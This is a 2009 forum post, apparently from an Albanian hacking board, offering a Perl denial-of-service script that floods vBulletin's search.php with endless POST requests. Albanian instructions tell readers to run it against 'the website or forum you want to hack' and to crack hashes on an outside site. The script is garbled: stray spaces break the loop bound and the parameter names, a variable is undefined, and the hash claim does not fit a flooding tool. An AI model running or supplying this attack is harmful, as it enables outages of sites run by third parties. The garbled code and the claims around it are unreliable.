HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 

 vBulletiin All Version

View previous topic View next topic Go down 

Posts : 35
Join date : 2009-05-28

PostSubject: vBulletiin All Version   Thu May 28, 2009 11:27 am

VBulletin DoS Exploit


#Exploit eshte testuar ne 15 faqe dhe ne 13 ka funksionuar. 98% Works


# important => Make sure that Image Verification in (search.php) is NOT Enabled.

# It works on 3.6.5 and prior [all] !


#Perl Script

use Socket;

if (@ARGV < 2) { &usage; }


$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<99999999999999999999999999999999999999999999999 99999999999999999999999; $i++)



$data = "s=&do=process&query=$user&titleonly=0&starter only =0&exactname=1&replyless=0&replylimit=3&searchdat e =1&beforeafter=before&sortby=title&order=descendi n g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";

$len = length $data;

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".

"Accept: */*\r\n".

"Accept-Language: en-gb\r\n".

"Content-Type: application/x-www-form-urlencoded\r\n".

"Accept-Encoding: gzip, deflate\r\n".

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

"Host: $host\r\n".

"Content-Length: $len\r\n".

"Connection: Keep-Alive\r\n".

"Cache-Control: no-cache\r\n\r\n".


my $port = "80";

my $proto = getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

send(SOCKET,"$foo", 0);

syswrite STDOUT, "|";


print "\n\n";

system('ping $host');

sub usage {

print "\tusage: \n";

print "\t$0 \n";

print "\tex: $0 /forum/\n";

print "\tex2: $0 / (if there isn't a dir)\n\n";



kete script e merrni e bani copy paste ne notepad edhe e runi si emri.pl tai shkon start run e shkruni cmd tani ku e keni rujt pershembell nese e keni rujt te fajllat ne perl bin shkoni kshtu cd C:\perl\bin tani ju hapet perl bin edhe e shkruni emrin e perlit qe ja keni lan psh emri.pl www.test.com aty te test e shkruni webin a po forumin qe doni me hakirat dhe tani jav qet ni hash code per me zberthy hash code shkoni tek www.gdataonline.com dhe tani vazhdoni me hapat tjer tung nga trigoni
Back to top Go down
View user profile http://delax.forumotion.net
vBulletiin All Version
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
» Changes for Version 2
» Version 4 Available
» Oh why do I ... [version 2, go!]
» Guide: Running Uranium 4.0 (Windows-version) on MacOSX

Permissions in this forum:You cannot reply to topics in this forum
 :: Delax Box :: Exploit-
Jump to: